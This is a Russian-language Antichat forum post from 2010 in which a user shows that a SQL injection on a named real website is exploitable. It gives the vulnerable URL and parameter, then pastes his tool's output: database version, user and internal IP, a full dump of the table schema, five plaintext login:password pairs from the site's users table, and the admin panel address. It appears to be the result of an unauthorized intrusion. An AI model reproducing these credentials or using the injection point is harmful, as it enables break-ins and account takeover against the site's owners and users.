Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

#10

11.03.2010, 20:34

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Цитата:

Сообщение от Pashkela

а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая:

Цитата:

Сообщение от mailbrush

CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.

Цитата:

Сообщение от Strilo4ka

паша та там принтабельный полей точно нет ...

вам просто не хватает хекерской догадки 34%, зацените

http://www.nwec.ru/index.php?issue_id=54

//ps sipt:

Код:

Database Version: 5.0.77-log
Database name: db_cevzap_1
User name: dbu_cevzap_1@192.168.5.56
0 :In database information_schema found table CHARACTER_SETS
   0 :   CHARACTER_SET_NAME
   1 :   DEFAULT_COLLATE_NAME
   2 :   DESCRIPTION
   3 :   MAXLEN
1 :In database information_schema found table CLIENT_STATISTICS
   0 :   CLIENT
   1 :   TOTAL_CONNECTIONS
   2 :   CONCURRENT_CONNECTIONS
   3 :   CONNECTED_TIME
   4 :   BUSY_TIME
   5 :   CPU_TIME
   6 :   BYTES_RECEIVED
   7 :   BYTES_SENT
   8 :   BINLOG_BYTES_WRITTEN
   9 :   ROWS_FETCHED
   10 :   ROWS_UPDATED
   11 :   TABLE_ROWS_READ
   12 :   SELECT_COMMANDS
   13 :   UPDATE_COMMANDS
   14 :   OTHER_COMMANDS
   15 :   COMMIT_TRANSACTIONS
   16 :   ROLLBACK_TRANSACTIONS
   17 :   DENIED_CONNECTIONS
   18 :   LOST_CONNECTIONS
   19 :   ACCESS_DENIED
   20 :   EMPTY_QUERIES
2 :In database information_schema found table COLLATIONS
   0 :   COLLATION_NAME
   1 :   CHARACTER_SET_NAME
   2 :   ID
   3 :   IS_DEFAULT
   4 :   IS_COMPILED
   5 :   SORTLEN
3 :In database information_schema found table COLLATION_CHARACTER_SET_APPLICABILITY
   0 :   COLLATION_NAME
   1 :   CHARACTER_SET_NAME
4 :In database information_schema found table COLUMNS
   0 :   TABLE_CATALOG
   1 :   TABLE_SCHEMA
   2 :   TABLE_NAME
   3 :   COLUMN_NAME
   4 :   ORDINAL_POSITION
   5 :   COLUMN_DEFAULT
   6 :   IS_NULLABLE
   7 :   DATA_TYPE
   8 :   CHARACTER_MAXIMUM_LENGTH
   9 :   CHARACTER_OCTET_LENGTH
   10 :   NUMERIC_PRECISION
   11 :   NUMERIC_SCALE
   12 :   CHARACTER_SET_NAME
   13 :   COLLATION_NAME
   14 :   COLUMN_TYPE
   15 :   COLUMN_KEY
   16 :   EXTRA
   17 :   PRIVILEGES
   18 :   COLUMN_COMMENT
5 :In database information_schema found table COLUMN_PRIVILEGES
   0 :   GRANTEE
   1 :   TABLE_CATALOG
   2 :   TABLE_SCHEMA
   3 :   TABLE_NAME
   4 :   COLUMN_NAME
   5 :   PRIVILEGE_TYPE
   6 :   IS_GRANTABLE
6 :In database information_schema found table INDEX_STATISTICS
   0 :   TABLE_SCHEMA
   1 :   TABLE_NAME
   2 :   INDEX_NAME
   3 :   ROWS_READ
7 :In database information_schema found table KEY_COLUMN_USAGE
   0 :   CONSTRAINT_CATALOG
   1 :   CONSTRAINT_SCHEMA
   2 :   CONSTRAINT_NAME
   3 :   TABLE_CATALOG
   4 :   TABLE_SCHEMA
   5 :   TABLE_NAME
   6 :   COLUMN_NAME
   7 :   ORDINAL_POSITION
   8 :   POSITION_IN_UNIQUE_CONSTRAINT
   9 :   REFERENCED_TABLE_SCHEMA
   10 :   REFERENCED_TABLE_NAME
   11 :   REFERENCED_COLUMN_NAME
8 :In database information_schema found table PROFILING
   0 :   QUERY_ID
   1 :   SEQ
   2 :   STATE
   3 :   DURATION
   4 :   CPU_USER
   5 :   CPU_SYSTEM
   6 :   CONTEXT_VOLUNTARY
   7 :   CONTEXT_INVOLUNTARY
   8 :   BLOCK_OPS_IN
   9 :   BLOCK_OPS_OUT
   10 :   MESSAGES_SENT
   11 :   MESSAGES_RECEIVED
   12 :   PAGE_FAULTS_MAJOR
   13 :   PAGE_FAULTS_MINOR
   14 :   SWAPS
   15 :   SOURCE_FUNCTION
   16 :   SOURCE_FILE
   17 :   SOURCE_LINE
9 :In database information_schema found table ROUTINES
   0 :   SPECIFIC_NAME
   1 :   ROUTINE_CATALOG
   2 :   ROUTINE_SCHEMA
   3 :   ROUTINE_NAME
   4 :   ROUTINE_TYPE
   5 :   DTD_IDENTIFIER
   6 :   ROUTINE_BODY
   7 :   ROUTINE_DEFINITION
   8 :   EXTERNAL_NAME
   9 :   EXTERNAL_LANGUAGE
   10 :   PARAMETER_STYLE
   11 :   IS_DETERMINISTIC
   12 :   SQL_DATA_ACCESS
   13 :   SQL_PATH
   14 :   SECURITY_TYPE
   15 :   CREATED
   16 :   LAST_ALTERED
   17 :   SQL_MODE
   18 :   ROUTINE_COMMENT
   19 :   DEFINER
10 :In database information_schema found table SCHEMATA
   0 :   CATALOG_NAME
   1 :   SCHEMA_NAME
   2 :   DEFAULT_CHARACTER_SET_NAME
   3 :   DEFAULT_COLLATION_NAME
   4 :   SQL_PATH
11 :In database information_schema found table SCHEMA_PRIVILEGES
   0 :   GRANTEE
   1 :   TABLE_CATALOG
   2 :   TABLE_SCHEMA
   3 :   PRIVILEGE_TYPE
   4 :   IS_GRANTABLE
12 :In database information_schema found table STATISTICS
   0 :   TABLE_CATALOG
   1 :   TABLE_SCHEMA
   2 :   TABLE_NAME
   3 :   NON_UNIQUE
   4 :   INDEX_SCHEMA
   5 :   INDEX_NAME
   6 :   SEQ_IN_INDEX
   7 :   COLUMN_NAME
   8 :   COLLATION
   9 :   CARDINALITY
   10 :   SUB_PART
   11 :   PACKED
   12 :   NULLABLE
   13 :   INDEX_TYPE
   14 :   COMMENT
13 :In database information_schema found table TABLES
   0 :   TABLE_CATALOG
   1 :   TABLE_SCHEMA
   2 :   TABLE_NAME
   3 :   TABLE_TYPE
   4 :   ENGINE
   5 :   VERSION
   6 :   ROW_FORMAT
   7 :   TABLE_ROWS
   8 :   AVG_ROW_LENGTH
   9 :   DATA_LENGTH
   10 :   MAX_DATA_LENGTH
   11 :   INDEX_LENGTH
   12 :   DATA_FREE
   13 :   AUTO_INCREMENT
   14 :   CREATE_TIME
   15 :   UPDATE_TIME
   16 :   CHECK_TIME
   17 :   TABLE_COLLATION
   18 :   CHECKSUM
   19 :   CREATE_OPTIONS
   20 :   TABLE_COMMENT
14 :In database information_schema found table TABLE_CONSTRAINTS
   0 :   CONSTRAINT_CATALOG
   1 :   CONSTRAINT_SCHEMA
   2 :   CONSTRAINT_NAME
   3 :   TABLE_SCHEMA
   4 :   TABLE_NAME
   5 :   CONSTRAINT_TYPE
15 :In database information_schema found table TABLE_PRIVILEGES
   0 :   GRANTEE
   1 :   TABLE_CATALOG
   2 :   TABLE_SCHEMA
   3 :   TABLE_NAME
   4 :   PRIVILEGE_TYPE
   5 :   IS_GRANTABLE
16 :In database information_schema found table TABLE_STATISTICS
   0 :   TABLE_SCHEMA
   1 :   TABLE_NAME
   2 :   ROWS_READ
   3 :   ROWS_CHANGED
   4 :   ROWS_CHANGED_X_INDEXES
17 :In database information_schema found table TRIGGERS
   0 :   TRIGGER_CATALOG
   1 :   TRIGGER_SCHEMA
   2 :   TRIGGER_NAME
   3 :   EVENT_MANIPULATION
   4 :   EVENT_OBJECT_CATALOG
   5 :   EVENT_OBJECT_SCHEMA
   6 :   EVENT_OBJECT_TABLE
   7 :   ACTION_ORDER
   8 :   ACTION_CONDITION
   9 :   ACTION_STATEMENT
   10 :   ACTION_ORIENTATION
   11 :   ACTION_TIMING
   12 :   ACTION_REFERENCE_OLD_TABLE
   13 :   ACTION_REFERENCE_NEW_TABLE
   14 :   ACTION_REFERENCE_OLD_ROW
   15 :   ACTION_REFERENCE_NEW_ROW
   16 :   CREATED
   17 :   SQL_MODE
   18 :   DEFINER
18 :In database information_schema found table USER_PRIVILEGES
   0 :   GRANTEE
   1 :   TABLE_CATALOG
   2 :   PRIVILEGE_TYPE
   3 :   IS_GRANTABLE
19 :In database information_schema found table USER_STATISTICS
   0 :   USER
   1 :   TOTAL_CONNECTIONS
   2 :   CONCURRENT_CONNECTIONS
   3 :   CONNECTED_TIME
   4 :   BUSY_TIME
   5 :   CPU_TIME
   6 :   BYTES_RECEIVED
   7 :   BYTES_SENT
   8 :   BINLOG_BYTES_WRITTEN
   9 :   ROWS_FETCHED
   10 :   ROWS_UPDATED
   11 :   TABLE_ROWS_READ
   12 :   SELECT_COMMANDS
   13 :   UPDATE_COMMANDS
   14 :   OTHER_COMMANDS
   15 :   COMMIT_TRANSACTIONS
   16 :   ROLLBACK_TRANSACTIONS
   17 :   DENIED_CONNECTIONS
   18 :   LOST_CONNECTIONS
   19 :   ACCESS_DENIED
   20 :   EMPTY_QUERIES
   21 :   LAST_STAT_FLUSH_TIME
   22 :   SELECT_FULL_JOIN_COUNT
   23 :   SELECT_SCAN_COUNT
   24 :   CREATED_TMP_DISK_TABLES
   25 :   LONG_QUERY_COUNT
20 :In database information_schema found table VIEWS
   0 :   TABLE_CATALOG
   1 :   TABLE_SCHEMA
   2 :   TABLE_NAME
   3 :   VIEW_DEFINITION
   4 :   CHECK_OPTION
   5 :   IS_UPDATABLE
   6 :   DEFINER
   7 :   SECURITY_TYPE
21 :In database db_cevzap_1 found table albums
   0 :   id
   1 :   object
   2 :   issue_id
   3 :   sortorder
   4 :   author
   5 :   title
   6 :   discription
   7 :   params
   8 :   flags
   9 :   date
   10 :   meta_title
   11 :   meta_keywords
   12 :   meta_discription
   13 :   image
22 :In database db_cevzap_1 found table articles
   0 :   id
   1 :   object_id
   2 :   sortorder
   3 :   issue_id
   4 :   date
   5 :   uid
   6 :   title
   7 :   text
23 :In database db_cevzap_1 found table bannerblocks
   0 :   BlockID
   1 :   Alias
   2 :   Name
   3 :   MaxItems
   4 :   Rule
   5 :   Template
24 :In database db_cevzap_1 found table banners
   0 :   BannerID
   1 :   BlockID
   2 :   IssueID
   3 :   Code
   4 :   Link
   5 :   File
   6 :   Shows
   7 :   Clicks
   8 :   Expire
   9 :   ShowsLimit
25 :In database db_cevzap_1 found table catalog
   0 :   PID
   1 :   ClassID
   2 :   Date
   3 :   Name
   4 :   Announce
   5 :   FullText
   6 :   Price
   7 :   Photo
   8 :   P1value
   9 :   P2value
   10 :   ShortCut
   11 :   Quantity
   12 :   sortorder
   13 :   galery_link
26 :In database db_cevzap_1 found table catitems
   0 :   id
   1 :   itemid
   2 :   sortorder
   3 :   name
   4 :   mainpage
   5 :   link
27 :In database db_cevzap_1 found table cities
   0 :   id
   1 :   name
   2 :   sortorder
28 :In database db_cevzap_1 found table classificator
   0 :   IssueID
   1 :   ObjectID
   2 :   StructID
   3 :   ParentID
   4 :   SortOrder
   5 :   Name
   6 :   Phrase_1
   7 :   Phrase_2
   8 :   Phrase_3
29 :In database db_cevzap_1 found table clients
   0 :   UserID
   1 :   Login
   2 :   Password
   3 :   Name
   4 :   Org
   5 :   Position
   6 :   Email
   7 :   Active
30 :In database db_cevzap_1 found table globals
   0 :   id
   1 :   name
   2 :   value
31 :In database db_cevzap_1 found table images
   0 :   id
   1 :   object
   2 :   sortorder
   3 :   album
   4 :   date
   5 :   title
   6 :   discription
   7 :   image
   8 :   thumb
32 :In database db_cevzap_1 found table imp_news
   0 :   id
   1 :   title
   2 :   description
   3 :   link
   4 :   datetime
   5 :   active
33 :In database db_cevzap_1 found table issues
   0 :   id
   1 :   parent
   2 :   order
   3 :   object
   4 :   name
   5 :   type
   6 :   params
   7 :   flags
   8 :   sign
   9 :   mainpage
   10 :   link
34 :In database db_cevzap_1 found table issues_rights
   0 :   id
   1 :   user_id
   2 :   issue_id
   3 :   deny
35 :In database db_cevzap_1 found table news
   0 :   id
   1 :   sortorder
   2 :   object
   3 :   issue_id
   4 :   title
   5 :   small_text
   6 :   full_text
   7 :   image
36 :In database db_cevzap_1 found table objects
   0 :   id
   1 :   date
   2 :   author
   3 :   type
   4 :   access
   5 :   meta_title
   6 :   meta_keywords
   7 :   meta_discription
37 :In database db_cevzap_1 found table users
   0 :   id
   1 :   login
   2 :   password
   3 :   status
   4 :   nick
   5 :   userdata
   6 :   usergroup
   7 :   block
   8 :   allowedactions
38 :In database db_cevzap_1 found table vacancies
   0 :   id
   1 :   city_id
   2 :   position
   3 :   data
   4 :   sortorder
Getting Data from table users  ( Rows) from database db_cevzap_1
Fields login:password

[1]:personal:P@s$W0Rd
[2]:e_efros:e_efros
[3]:sn_dmitrieva:Pa$$w0rD
[4]:k_shishkin:$trong_P@ssw0rd
[5]:a_avrashov:a_avrashov

End Data

http://www.nwec.ru/admin.php

__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..

ANTICHAT — форум по информационной безопасности, OSINT и технологиям